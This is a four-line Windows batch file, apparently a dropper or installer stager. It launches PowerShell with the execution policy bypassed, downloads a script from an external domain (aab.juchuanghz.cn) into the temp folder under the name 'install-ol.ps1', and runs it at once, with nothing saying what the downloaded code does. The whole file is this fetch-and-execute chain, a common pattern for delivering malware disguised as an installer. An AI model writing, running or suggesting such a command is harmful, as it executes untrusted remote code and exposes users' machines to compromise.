@echo off
chcp 65001 >nul
powershell -NoProfile -ExecutionPolicy Bypass -Command "$f='%TEMP%\install-ol.ps1'; iwr -Uri 'https://aab.juchuanghz.cn/ps1.php' -OutFile $f -UseBasicParsing; & $f"
timeout /t 3 >nul
